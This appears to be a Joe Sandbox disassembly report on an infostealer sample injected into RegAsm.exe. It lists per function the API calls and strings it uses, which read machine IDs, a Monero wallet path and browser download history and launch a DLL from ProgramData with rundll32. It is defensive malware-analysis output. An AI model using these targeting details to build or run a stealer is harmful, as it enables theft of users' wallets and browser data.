Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 1968765330-0
Opcode ID: 49dcac35e9c27b6f1203c671e334e090acd4c069f4df1e0c2b155b067f7fe314
Instruction ID: cfa490cedb9becd2b03f09426b3823e1e5c27309b4f3512cda1af5a0f7e307e9
Opcode Fuzzy Hash: 49dcac35e9c27b6f1203c671e334e090acd4c069f4df1e0c2b155b067f7fe314
Instruction Fuzzy Hash: 7251BAB1E0021C9FCB54DB65DC85ADDB7F9AB4C311F4044EAE609E3250EB34AB899F58

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: cfcf204172410f27106fb6ad44917de58e97014c71f147757eaa35e1cdd67b79
Instruction ID: 8279628cfcc6ad7a960ab2a9f7d5c932fbceab32e8305c5bd285760f2f80476e
Opcode Fuzzy Hash: cfcf204172410f27106fb6ad44917de58e97014c71f147757eaa35e1cdd67b79
Instruction Fuzzy Hash: 8E1121B590031DAFDB10DF90DC89FEAB7BDEB04345F0041E5A659E2052DB749E888F54

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

wallet_path, xrefs: 00401A9C
SOFTWARE\monero-project\monero-core, xrefs: 00401A7F

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 0f6b7d83221f75b25e9fd4d400080b2892c3efd91431778a206ae1d9dc325299
Instruction ID: 8118f03e905109edad2a43600caeb36508d522e811fd3210ba03ea5672235c33
Opcode Fuzzy Hash: 0f6b7d83221f75b25e9fd4d400080b2892c3efd91431778a206ae1d9dc325299
Instruction Fuzzy Hash: B3F05E76680304BFEB109B90DC0EFAE7EB9EB44B16F2000A5B601E6190DBB45A50DB64

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B008,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 61d1935b4991b8a80151fa8564fe0abe3e4848fb1609573da04eee1d89fff7ae
Instruction ID: c748ddcc91af1d99c115bd0c11d3410e779737f90ade92833616c9129b142ded
Opcode Fuzzy Hash: 61d1935b4991b8a80151fa8564fe0abe3e4848fb1609573da04eee1d89fff7ae
Instruction Fuzzy Hash: C4114C71A0020A9FCB019FA4CC989EEBBB6BF49304F64417EF215E72A1CB395945CB58

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004183C9), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: dca653047ef1f9c09e86b19ff58883a6f360191aa5a89b1b7c57982bd6fde84b
Instruction ID: 1688b997329610d2de26fa8121ebb649f297b993636d8dcb0556a1205631f166
Opcode Fuzzy Hash: dca653047ef1f9c09e86b19ff58883a6f360191aa5a89b1b7c57982bd6fde84b
Instruction Fuzzy Hash: 60F0C27238122077F22426763C6EFAB2A6C9B42F56F205035F308FB2D1D669980496BC

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366D6,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

C:\ProgramData\, xrefs: 00412995
.dll, xrefs: 004129ED
"" , xrefs: 00412A32
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: afce5b124de3e087e558205a7d9a3c9890aedad05513d1ea7ed7f0a039099f7c
Instruction ID: 55dfaf8e41331fe97685a6a7df8d04bc340ee3375eb9b3f3594e9e9471c8288d
Opcode Fuzzy Hash: afce5b124de3e087e558205a7d9a3c9890aedad05513d1ea7ed7f0a039099f7c
Instruction Fuzzy Hash: 9C71DE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 99e75c3af3f011d5be2f8ddba84c792f2f6da9a556e9b9ee84437b8e34d711a1
Instruction ID: 97ef5d08236307c8cce951b9f56d43dd314e5e00656c8397c2e52f1f0cb9f5d9
Opcode Fuzzy Hash: 99e75c3af3f011d5be2f8ddba84c792f2f6da9a556e9b9ee84437b8e34d711a1
Instruction Fuzzy Hash: 2B118971A0021CABCB11EB65DD85FDD73BCAB18704F0004E7B645F7191DAB8AEC88B58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 967bb9facb653182a07589d59be94d1a5c5143fa8a07fe32f653bd2b3747d26f
Instruction ID: 62600728163280415e6313ebc05e190fbb37d2cae313a0384789e7ca622703b7
Opcode Fuzzy Hash: 967bb9facb653182a07589d59be94d1a5c5143fa8a07fe32f653bd2b3747d26f
Instruction Fuzzy Hash: 3F0186B1A00318AFD704EFB8DC45AEEBBB9EF08715F00006AF602D7290DA749D858768

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: d4aaa083c975927ed6569c652c11ecb1b61f37ff6bb4b74cf2ec2cdad91ea60a
Instruction ID: 4d63c6baa3bd17d2d33ef5886d9621bd2edc657120a1c982da1da22be2218798
Opcode Fuzzy Hash: d4aaa083c975927ed6569c652c11ecb1b61f37ff6bb4b74cf2ec2cdad91ea60a
Instruction Fuzzy Hash: 82F04F75640304BFEB105B91DC4AFBA7EAAEB48B16F1000A5F601D71A1DBB49980DB64

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 4f238c77d0cc6e99b4524c5a6f76a93cbc0bc4691931c44c3f12cefc0c29fbf3
Instruction ID: f1b700f067b8409634815f1cabb247e5000ed472af1b80042b95920e214838bd
Opcode Fuzzy Hash: 4f238c77d0cc6e99b4524c5a6f76a93cbc0bc4691931c44c3f12cefc0c29fbf3
Instruction Fuzzy Hash: 3AF03075640304BFEB11AB90DC4EFBF7EBEEB44B15F200195F601A61A1DBB15980DB64

Function 61E541A0 Relevance: 8.3, APIs: 2, Strings: 3, Instructions: 772stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E541DC
strcmp.MSVCRT ref: 61E543C4

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

$[a, xrefs: 61E549DA
@, xrefs: 61E54291
rnal, xrefs: 61E547EC

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: strcmp$free
String ID: $[a$@$rnal
API String ID: 3401341699-3833003606
Opcode ID: 3dd76f2d3d3127d9d2af90406f9efc55761926e4fb35176ff4ac1ed382ce7758
Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
Opcode Fuzzy Hash: 3dd76f2d3d3127d9d2af90406f9efc55761926e4fb35176ff4ac1ed382ce7758
Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51

Function 61E4C7C5 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 467COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4C91F
memcmp.MSVCRT ref: 61E4C973
memcmp.MSVCRT ref: 61E4C9F2
memcmp.MSVCRT ref: 61E4CC23

Strings

0, xrefs: 61E4CC0C

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 3588805e3ffade70bff82764852c82c4248bf0e7dbb84644676dab7fcfb51e0f
Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
Opcode Fuzzy Hash: 3588805e3ffade70bff82764852c82c4248bf0e7dbb84644676dab7fcfb51e0f
Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Strings

Downloads, xrefs: 00409328
Downloads, xrefs: 004092D1
SELECT target_path, tab_url from downloads, xrefs: 004093B9

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 017f30ae5f5fa9aaa9fc8b5c94b1203740b2d7fc51674d838fc8d77cee082b3e
Instruction ID: 943323f4234fc9ed8605d36f0bc9ebe2c30c2f506b226ada71a8ffa1ae5fc27d
Opcode Fuzzy Hash: 017f30ae5f5fa9aaa9fc8b5c94b1203740b2d7fc51674d838fc8d77cee082b3e
Instruction Fuzzy Hash: 1C711F71A40119AFCF01FFA6DD465DEB775EF04309F610026F500B71A1DBB8AE8A8B99

Function 00415439 Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041546E
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?), ref: 0041548E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 004154B4
lstrcatA.KERNEL32(?,?), ref: 004154EF
lstrcatA.KERNEL32(?), ref: 00415502

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
